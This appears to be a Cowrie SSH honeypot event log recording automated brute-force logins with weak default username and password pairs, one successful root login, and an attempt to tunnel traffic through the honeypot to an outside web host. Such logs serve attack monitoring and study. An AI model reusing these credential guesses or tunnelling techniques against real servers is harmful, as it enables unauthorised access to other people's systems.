{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:59:21.068127Z","src_ip":"212.227.125.160","session":"6c93a46991ee"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"1234567","message":"login attempt [ec2-user/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:59:21.768867Z","src_ip":"212.227.125.160","session":"6c93a46991ee"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:59:22.946786Z","src_ip":"212.227.125.160","session":"6c93a46991ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50972,"dst_ip":"1.2.3.4","dst_port":22,"session":"9547fbc9ad0e","protocol":"ssh","message":"New connection: 212.227.125.160:50972 (1.2.3.4:22) [session: 9547fbc9ad0e]","sensor":"my-vps","timestamp":"2025-08-28T13:59:54.592108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:59:54.592996Z","src_ip":"212.227.125.160","session":"9547fbc9ad0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:59:54.756137Z","src_ip":"212.227.125.160","session":"9547fbc9ad0e"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:59:55.255100Z","src_ip":"212.227.125.160","session":"9547fbc9ad0e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:59:56.420361Z","src_ip":"212.227.125.160","session":"9547fbc9ad0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46510,"dst_ip":"1.2.3.4","dst_port":22,"session":"be485d863a43","protocol":"ssh","message":"New connection: 212.227.125.160:46510 (1.2.3.4:22) [session: be485d863a43]","sensor":"my-vps","timestamp":"2025-08-28T14:00:01.536727Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:00:03.848502Z","src_ip":"212.227.125.160","session":"be485d863a43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32453,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c4cf3042385","protocol":"ssh","message":"New connection: 212.227.235.229:32453 (1.2.3.4:22) [session: 6c4cf3042385]","sensor":"my-vps","timestamp":"2025-08-28T14:00:18.447453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:00:18.448477Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:00:18.576699Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.login.failed","username":"jose","password":"jose","message":"login attempt [jose/jose] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:19.191536Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc123","message":"login attempt [jose/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:20.321653Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd123","message":"login attempt [jose/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:21.452109Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abcd1234","message":"login attempt [jose/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:22.582471Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.login.failed","username":"jose","password":"abc1234","message":"login attempt [jose/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:23.714072Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:00:24.844600Z","src_ip":"212.227.235.229","session":"6c4cf3042385"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37256,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e21572f7316","protocol":"ssh","message":"New connection: 212.227.125.160:37256 (1.2.3.4:22) [session: 7e21572f7316]","sensor":"my-vps","timestamp":"2025-08-28T14:00:29.641935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:00:29.642974Z","src_ip":"212.227.125.160","session":"7e21572f7316"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:00:29.821554Z","src_ip":"212.227.125.160","session":"7e21572f7316"}
{"eventid":"cowrie.login.failed","username":"centos","password":"password","message":"login attempt [centos/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:00:30.577561Z","src_ip":"212.227.125.160","session":"7e21572f7316"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:00:31.756635Z","src_ip":"212.227.125.160","session":"7e21572f7316"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54434,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8a581cf4e49","protocol":"ssh","message":"New connection: 212.227.125.160:54434 (1.2.3.4:22) [session: d8a581cf4e49]","sensor":"my-vps","timestamp":"2025-08-28T14:01:05.789137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:01:05.803107Z","src_ip":"212.227.125.160","session":"d8a581cf4e49"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:01:05.973412Z","src_ip":"212.227.125.160","session":"d8a581cf4e49"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456789","message":"login attempt [centos/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:01:06.677220Z","src_ip":"212.227.125.160","session":"d8a581cf4e49"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:01:07.855132Z","src_ip":"212.227.125.160","session":"d8a581cf4e49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33683,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c6b96a6e737","protocol":"ssh","message":"New connection: 212.227.125.160:33683 (1.2.3.4:22) [session: 1c6b96a6e737]","sensor":"my-vps","timestamp":"2025-08-28T14:01:10.128697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-28T14:01:10.164857Z","src_ip":"212.227.125.160","session":"1c6b96a6e737"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-08-28T14:01:10.296140Z","src_ip":"212.227.125.160","session":"1c6b96a6e737"}
{"eventid":"cowrie.session.closed","duration":"14.5","message":"Connection lost after 14.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:01:24.678096Z","src_ip":"212.227.125.160","session":"1c6b96a6e737"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50308,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97ed5b82acf","protocol":"ssh","message":"New connection: 212.227.125.160:50308 (1.2.3.4:22) [session: b97ed5b82acf]","sensor":"my-vps","timestamp":"2025-08-28T14:01:42.358302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:01:42.359385Z","src_ip":"212.227.125.160","session":"b97ed5b82acf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:01:42.521998Z","src_ip":"212.227.125.160","session":"b97ed5b82acf"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:01:43.014770Z","src_ip":"212.227.125.160","session":"b97ed5b82acf"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:01:44.180224Z","src_ip":"212.227.125.160","session":"b97ed5b82acf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60412,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c8bf2e72ac","protocol":"ssh","message":"New connection: 212.227.125.160:60412 (1.2.3.4:22) [session: 29c8bf2e72ac]","sensor":"my-vps","timestamp":"2025-08-28T14:02:18.762029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:02:18.769310Z","src_ip":"212.227.125.160","session":"29c8bf2e72ac"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:02:18.930569Z","src_ip":"212.227.125.160","session":"29c8bf2e72ac"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345678","message":"login attempt [centos/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:02:19.604579Z","src_ip":"212.227.125.160","session":"29c8bf2e72ac"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:02:20.774420Z","src_ip":"212.227.125.160","session":"29c8bf2e72ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43839,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf5e4271f04e","protocol":"ssh","message":"New connection: 212.227.125.160:43839 (1.2.3.4:22) [session: bf5e4271f04e]","sensor":"my-vps","timestamp":"2025-08-28T14:02:43.727120Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:02:43.728234Z","src_ip":"212.227.125.160","session":"bf5e4271f04e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44124,"dst_ip":"1.2.3.4","dst_port":22,"session":"216c03be4bbc","protocol":"ssh","message":"New connection: 212.227.125.160:44124 (1.2.3.4:22) [session: 216c03be4bbc]","sensor":"my-vps","timestamp":"2025-08-28T14:02:43.841090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:02:43.841756Z","src_ip":"212.227.125.160","session":"216c03be4bbc"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T14:02:43.958290Z","src_ip":"212.227.125.160","session":"216c03be4bbc"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:02:44.306008Z","src_ip":"212.227.125.160","session":"216c03be4bbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T14:02:44.422214Z","session":"216c03be4bbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57898,"dst_ip":"1.2.3.4","dst_port":22,"session":"7470ca498a3a","protocol":"ssh","message":"New connection: 212.227.125.160:57898 (1.2.3.4:22) [session: 7470ca498a3a]","sensor":"my-vps","timestamp":"2025-08-28T14:02:55.529488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:02:55.530456Z","src_ip":"212.227.125.160","session":"7470ca498a3a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:02:55.694469Z","src_ip":"212.227.125.160","session":"7470ca498a3a"}
